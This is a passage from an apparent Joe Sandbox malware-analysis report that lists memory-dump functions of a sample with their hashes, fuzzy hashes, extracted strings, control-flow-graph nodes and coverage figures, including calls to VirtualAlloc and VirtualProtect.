                                                                                                                    • Opcode Fuzzy Hash: 4f1f64182b7902666ddbc57442134c647ebb60c2ea4aae483171ca91f635d47b
                                                                                                                    • Instruction Fuzzy Hash: C3C04850B0E12B86F2345685D071B7E52227F4030AE628438C01E069E18D28BB01AA12
                                                                                                                    Function 00007FFD9BBB048F Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1c8dfd208fef205d6e30a166527036f11473120852ac89e09f28c99c333a0a81
                                                                                                                    • Instruction ID: ab89f006acbb139bb96f57512fd4c14fdf89eb299852ffca07bd8d7644400cda
                                                                                                                    • Opcode Fuzzy Hash: 1c8dfd208fef205d6e30a166527036f11473120852ac89e09f28c99c333a0a81
                                                                                                                    • Instruction Fuzzy Hash: B3C04824B0E22B8AF1345A82C0B0A3F51126F40B08FA24438C00E06DE19E28BA41AA12

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7D06FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =O_^$O_^%$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                    • API String ID: 0-1144829533
                                                                                                                    • Opcode ID: 15074d7b1b300514b49a2a2061b8724bfab21b055fa3f89bb37589620c9edb60
                                                                                                                    • Instruction ID: 628dc045c1e6a0b469a63741b6cd2775dff2991222b3000c0b4cf0f1566f81a9
                                                                                                                    • Opcode Fuzzy Hash: 15074d7b1b300514b49a2a2061b8724bfab21b055fa3f89bb37589620c9edb60
                                                                                                                    • Instruction Fuzzy Hash: 9051945BE0C5A609E319B6A9356A8FD2720CFC137EB26D7B3E12F8D0D74C1C658241D9
                                                                                                                    Function 00007FFD9B7D063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =O_^$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                    • API String ID: 0-1414841115
                                                                                                                    • Opcode ID: e1a14f189f68e01b54587661b49a76da487c198034845691bd46b7d8bc50ec6c
                                                                                                                    • Instruction ID: 115c4eb84b70691eafede71d44fc81b47a77c86d1be32e5d615835417918973d
                                                                                                                    • Opcode Fuzzy Hash: e1a14f189f68e01b54587661b49a76da487c198034845691bd46b7d8bc50ec6c
                                                                                                                    • Instruction Fuzzy Hash: A681F21BF0C5A608E318B7AD756A9FD3720DFC037EB2686B7E16E8D0D78C18648681D5
                                                                                                                    Function 00007FFD9B7D06D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: O_^*$O_^+$O_^2$O_^4
                                                                                                                    • API String ID: 0-1903236095
                                                                                                                    • Opcode ID: 3b94d23530911228eb79c60deaba036ab9d61786c76665591512409472223631
                                                                                                                    • Instruction ID: 6072d330d00aa835542b95b8ea5219a3382d40ffb4731db57c33930d0d47cbd5
                                                                                                                    • Opcode Fuzzy Hash: 3b94d23530911228eb79c60deaba036ab9d61786c76665591512409472223631
                                                                                                                    • Instruction Fuzzy Hash: 0551A11BE0C5A605E319B7A9356A8FD2720CFC133EB2AD7B7E16F4D0DB4C18658241D9

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:6
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 19961 7ffd9b7db4ba 19962 7ffd9b7db4c9 VirtualProtect 19961->19962 19964 7ffd9b7db5ae 19962->19964 19957 7ffd9b7dc491 19958 7ffd9b7dc49f VirtualAlloc 19957->19958 19960 7ffd9b7dc554 19958->19960

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7D0D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 208 7ffd9b7d0d48-7ffd9b7d0d9b call 7ffd9b7d07d0 211 7ffd9b7d0da0-7ffd9b7d0eb9 208->211 226 7ffd9b7d0ef9-7ffd9b7d0f05 211->226 227 7ffd9b7d0ebb-7ffd9b7d0ef8 211->227 230 7ffd9b7d0f07-7ffd9b7d0f1d 226->230 231 7ffd9b7d0f1e 226->231 227->226 232 7ffd9b7d0f1f-7ffd9b7d0f63 230->232 231->232 237 7ffd9b7d0f65-7ffd9b7d0f9d 232->237 238 7ffd9b7d0fa3-7ffd9b7d1050 232->238 237->238
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263
                                                                                                                    • Opcode ID: a756f3d6e94c736fcc422f45f24db038feb8f6b667e106894f183f8fb75bbb2a
                                                                                                                    • Instruction ID: fd45440f4f34737c7d66f70fd0ae8752e67ccf6856d973da9db5c1d33406f3b2
                                                                                                                    • Opcode Fuzzy Hash: a756f3d6e94c736fcc422f45f24db038feb8f6b667e106894f183f8fb75bbb2a
                                                                                                                    • Instruction Fuzzy Hash: ED910675A19A8E8FE759DF6888757A97FE0FBD5300F0501BAD049C73E2DA781814C740
                                                                                                                    Function 00007FFD9B7E1752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ffd9b7e1752 1 7ffd9b7e1757-7ffd9b7e177d 0->1 4 7ffd9b7e18d1-7ffd9b7e18fb 1->4 5 7ffd9b7e1783-7ffd9b7e17ae 1->5 10 7ffd9b7e1947-7ffd9b7e194a 4->10 11 7ffd9b7e18fd-7ffd9b7e191a 4->11 15 7ffd9b7e17bd-7ffd9b7e1845 5->15 16 7ffd9b7e17b0-7ffd9b7e17ba 5->16 14 7ffd9b7e1951-7ffd9b7e1986 10->14 17 7ffd9b7e1a8b-7ffd9b7e1a93 11->17 18 7ffd9b7e1920-7ffd9b7e1945 11->18 36 7ffd9b7e1a2c-7ffd9b7e1a42 14->36 37 7ffd9b7e198c-7ffd9b7e19df 14->37 51 7ffd9b7e188c-7ffd9b7e188f 15->51 52 7ffd9b7e1847-7ffd9b7e188a 15->52 16->15 25 7ffd9b7e1a94-7ffd9b7e1a99 17->25 18->10 27 7ffd9b7e1a9b-7ffd9b7e1aaf 25->27 28 7ffd9b7e1a47-7ffd9b7e1a62 25->28 31 7ffd9b7e1c4d-7ffd9b7e1c4e 27->31 44 7ffd9b7e1a69-7ffd9b7e1a84 28->44 34 7ffd9b7e1c55-7ffd9b7e1c61 31->34 35 7ffd9b7e1c50 call 7ffd9b7e2918 31->35 35->34 36->31 37->44 59 7ffd9b7e19e5-7ffd9b7e19f0 37->59 44->17 53 7ffd9b7e1891-7ffd9b7e18a2 51->53 54 7ffd9b7e18a4-7ffd9b7e18a5 51->54 58 7ffd9b7e18b1-7ffd9b7e18cb 52->58 53->58 54->58 58->4 58->5 61 7ffd9b7e19f6-7ffd9b7e1a00 59->61 62 7ffd9b7e0f9d-7ffd9b7e0fdc 59->62 61->25 64 7ffd9b7e1a06-7ffd9b7e1a26 61->64 73 7ffd9b7e0fde-7ffd9b7e1149 62->73 64->36 64->37 98 7ffd9b7e114b-7ffd9b7e1154 73->98 99 7ffd9b7e1178-7ffd9b7e11b9 73->99 100 7ffd9b7e115a-7ffd9b7e116a 98->100 101 7ffd9b7e1699-7ffd9b7e16cf 98->101 111 7ffd9b7e11bb-7ffd9b7e11cd 99->111 112 7ffd9b7e11ce-7ffd9b7e1243 99->112 105 7ffd9b7e1170-7ffd9b7e1174 100->105 113 7ffd9b7e1748-7ffd9b7e1751 101->113 114 7ffd9b7e16d1-7ffd9b7e1710 101->114 105->99 111->112 129 7ffd9b7e1245-7ffd9b7e126e 112->129 130 7ffd9b7e1274-7ffd9b7e12c3 112->130 113->0 123 7ffd9b7e172a-7ffd9b7e1746 114->123 124 7ffd9b7e1712-7ffd9b7e1715 114->124 123->113 123->114 124->123 125 7ffd9b7e1717-7ffd9b7e1727 124->125 125->123 129->130 138 7ffd9b7e12c5-7ffd9b7e12ca 130->138 139 7ffd9b7e12cf-7ffd9b7e1307 130->139 140 7ffd9b7e1683-7ffd9b7e1693 138->140 144 7ffd9b7e1309-7ffd9b7e130e 139->144 145 7ffd9b7e1313-7ffd9b7e134b 139->145 140->101 140->105 144->140 149 7ffd9b7e1357-7ffd9b7e138f 145->149 150 7ffd9b7e134d-7ffd9b7e1352 145->150 154 7ffd9b7e139b-7ffd9b7e13d3 149->154 155 7ffd9b7e1391-7ffd9b7e1396 149->155 150->140 159 7ffd9b7e13d5-7ffd9b7e13da 154->159 160 7ffd9b7e13df-7ffd9b7e1417 154->160 155->140 159->140 164 7ffd9b7e1419-7ffd9b7e141e 160->164 165 7ffd9b7e1423-7ffd9b7e145b 160->165 164->140 169 7ffd9b7e1467-7ffd9b7e149f 165->169 170 7ffd9b7e145d-7ffd9b7e1462 165->170 174 7ffd9b7e14ab-7ffd9b7e14e3 169->174 175 7ffd9b7e14a1-7ffd9b7e14a6 169->175 170->140 179 7ffd9b7e14e5-7ffd9b7e14ea 174->179 180 7ffd9b7e14ef-7ffd9b7e1527 174->180 175->140 179->140 184 7ffd9b7e1529-7ffd9b7e152e 180->184 185 7ffd9b7e1533-7ffd9b7e156b 180->185 184->140 189 7ffd9b7e1577-7ffd9b7e15af 185->189 190 7ffd9b7e156d-7ffd9b7e1572 185->190 194 7ffd9b7e15bb-7ffd9b7e15c4 189->194 195 7ffd9b7e15b1-7ffd9b7e15b6 189->195 190->140 194->140 195->140
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_H
                                                                                                                    • API String ID: 0-1910052747
                                                                                                                    • Opcode ID: 930760284a8ab33735aa8c029e6cadd96dad255f60c03000865948cd224a67fa
                                                                                                                    • Instruction ID: c1845d712b09fdb7acb09fccdf9b9aecc6964ea23e05fe1100b43c560a0a0eb8
                                                                                                                    • Opcode Fuzzy Hash: 930760284a8ab33735aa8c029e6cadd96dad255f60c03000865948cd224a67fa
                                                                                                                    • Instruction Fuzzy Hash: 3462C661B19A4E4FEBB9EB6884A66787392FFD4340F0506B9D01EC36F2DE24BD458740
                                                                                                                    Function 00007FFD9B7DB4BA Relevance: 1.6, APIs: 1, Instructions: 142memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 197 7ffd9b7db4ba-7ffd9b7db4c7 198 7ffd9b7db4c9-7ffd9b7db4d1 197->198 199 7ffd9b7db4d2-7ffd9b7db4e3 197->199 198->199 200 7ffd9b7db4e5-7ffd9b7db4ed 199->200 201 7ffd9b7db4ee-7ffd9b7db5ac VirtualProtect 199->201 200->201 205 7ffd9b7db5b4-7ffd9b7db5dc 201->205 206 7ffd9b7db5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 5aadb705e93be66c006d0ef059defc6db69513e58eb27470fe9fd2820127506d
                                                                                                                    • Instruction ID: 96435bdbfe142b3e09af28a80be3f588e4081a5effcefda508073b1e6e725c89
                                                                                                                    • Opcode Fuzzy Hash: 5aadb705e93be66c006d0ef059defc6db69513e58eb27470fe9fd2820127506d
                                                                                                                    • Instruction Fuzzy Hash: 5F412C3190D78C4FD7199BA898565E97FF0EF96321F0443AFD099C3193CA746406C792
                                                                                                                    Function 00007FFD9B7DC491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 243 7ffd9b7dc491-7ffd9b7dc49d 244 7ffd9b7dc4a1-7ffd9b7dc4dd 243->244 245 7ffd9b7dc49f 243->245 246 7ffd9b7dc4e1-7ffd9b7dc552 VirtualAlloc 244->246 245->244 245->246 249 7ffd9b7dc55a-7ffd9b7dc582 246->249 250 7ffd9b7dc554 246->250 250->249
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction ID: 831ca31d8088c025a40b3d77225c57cd655a6ace0127c71836d8452f5b6534e2
                                                                                                                    • Opcode Fuzzy Hash: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction Fuzzy Hash: 9D31FB31A0CB8C4FDB1DAB6898166F97BF0EF96321F04426FD08AC3593DA65681687D1
                                                                                                                    Function 00007FFD9B801A49 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 252 7ffd9b801a49-7ffd9b801a7a 253 7ffd9b801a7e-7ffd9b801a83 252->253
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175
                                                                                                                    • Opcode ID: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction ID: becf1f39e9525a793ba07497bee1ae7102b934d9ba4949fd777c9ef4a46dbcae
                                                                                                                    • Opcode Fuzzy Hash: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction Fuzzy Hash: 32E0D830B557844FCB0DAA2C88654607BB1EF57205B8552EAC046CB1A3DD1CDC86C741
                                                                                                                    Function 00007FFD9B80A529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 254 7ffd9b80a529-7ffd9b80a53d 255 7ffd9b80a53f-7ffd9b80a55a 254->255 256 7ffd9b80a55e-7ffd9b80a563 255->256
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction ID: 9c1fd412609d37193d74b1f63005ae9c0c0a086f861702f3730ee312feda6007
                                                                                                                    • Opcode Fuzzy Hash: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction Fuzzy Hash: A2E0657160E7C44FC716D6744869454BFA0EF6721174A42EEC045CF5A7EA2DC885CB01
                                                                                                                    Function 00007FFD9B7F93E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 257 7ffd9b7f93e9-7ffd9b7f9414 259 7ffd9b7f9418-7ffd9b7f941d 257->259
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7f3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction ID: 3b0b8ed484c465483cbc07f443ba6c6e5324e6a3ae63e25c67437725e8b370ca
                                                                                                                    • Opcode Fuzzy Hash: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction Fuzzy Hash: E3E0E56154E7C48FCB5AEA7488A98547FA0AE6721078A41EEC489CB1B3E6299849C701
                                                                                                                    Function 00007FFD9B801AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 260 7ffd9b801ad9-7ffd9b801aed 261 7ffd9b801aef-7ffd9b801b04 260->261 262 7ffd9b801b08-7ffd9b801b0d 261->262
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction ID: 61d0df85dbf79a5133c738b04a6214dfdee090dbd2ed0a8886aa52041204512c
                                                                                                                    • Opcode Fuzzy Hash: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction Fuzzy Hash: B5E01A6154F7C44FCB16EB7488698497FA0EE6B21078B40EEC089CF1B3E62D8849CB01
                                                                                                                    Function 00007FFD9B807E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 263 7ffd9b807e19-7ffd9b807e44 265 7ffd9b807e48-7ffd9b807e4d 263->265
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction ID: 746f1d7e87106e55d745ec7dc1c1411a139633b184664479ab4c188562ea6f6d
                                                                                                                    • Opcode Fuzzy Hash: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction Fuzzy Hash: DFE01A6158F7C44FCB16EB7488698447FA1AE6B21078B40EEC185CF1B3E62D8849C701
                                                                                                                    Function 00007FFD9B7F95D1 Relevance: .3, Instructions: 312COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7f3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2e42c0b840a694982f2bf43641e8c139e1c6228901c0d05fe547effb288cc350
                                                                                                                    • Instruction ID: d7c9ed781fd1d949dbbf755be42fd557e03c9f9e5be81b7eeab954fbb9059ca5
                                                                                                                    • Opcode Fuzzy Hash: 2e42c0b840a694982f2bf43641e8c139e1c6228901c0d05fe547effb288cc350
                                                                                                                    • Instruction Fuzzy Hash: C6A1B470B19A0E8FDB69EF68C4A4AB977E1FF98304B510579D01DC72A6DF34A842C780
                                                                                                                    Function 00007FFD9B80317D Relevance: .3, Instructions: 287COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e61965dff97de1b38abc2694f5c8d3bf2728617538a22804df4f24b98f0466a
                                                                                                                    • Instruction ID: 900048253354fc4310fb3f1c2fbc9cc2cac81ac4715b7dde6e5b0449f54ea1d7
                                                                                                                    • Opcode Fuzzy Hash: 8e61965dff97de1b38abc2694f5c8d3bf2728617538a22804df4f24b98f0466a
                                                                                                                    • Instruction Fuzzy Hash: A7910361B1DA4E0FEBA8EB6884B66B9B2C2EF9C340F0141B9E44DC72D7DD2869454380
                                                                                                                    Function 00007FFD9B802111 Relevance: .1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 971c3f613061439df1688270fd9c141ea5b25e2a73f6630f0babef035b98035e
                                                                                                                    • Instruction ID: 2f0a4320833877f83996181e481642e17678685512114f10b23c51536e13903f
                                                                                                                    • Opcode Fuzzy Hash: 971c3f613061439df1688270fd9c141ea5b25e2a73f6630f0babef035b98035e
                                                                                                                    • Instruction Fuzzy Hash: A7314871A0894A8FE729DF98C8647F57791EF99320F0502BAD44DC32E2DAA86C418781
                                                                                                                    Function 00007FFD9B7D116D Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1155bec562425c9ddb49061954a45548bed7b6a30e008bd6028b2f25a021181
                                                                                                                    • Instruction ID: a86655dac84cf1c1fe66d99487ccc65a83c7114ab7a0cd80f3fe5116544fe3d5
                                                                                                                    • Opcode Fuzzy Hash: c1155bec562425c9ddb49061954a45548bed7b6a30e008bd6028b2f25a021181
                                                                                                                    • Instruction Fuzzy Hash: 7F317330A0964E8FDB45EB68C864AB977F0FFA9340F0546BAD00DD71B2DA38A945CB50
                                                                                                                    Function 00007FFD9B80D621 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b65ce9e06c90d6b26b71e89612d5b2a6ff16e2c7a8e8a7cb21a176cc57aac867
                                                                                                                    • Instruction ID: dbfc6800b8932175272736e2ffc8fd5392e0b82fd4f177e1bb4f0ba87b8690b7
                                                                                                                    • Opcode Fuzzy Hash: b65ce9e06c90d6b26b71e89612d5b2a6ff16e2c7a8e8a7cb21a176cc57aac867
                                                                                                                    • Instruction Fuzzy Hash: 1421F132F0A51D8FEB24DB68D8242E9B7E1EF88350F0506B7D459C72D5DA289E4587C0
                                                                                                                    Function 00007FFD9B7D0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce1425116253ac88e6adb1b8739f05f54c3f617d50cb26f99954dce6bef7c971
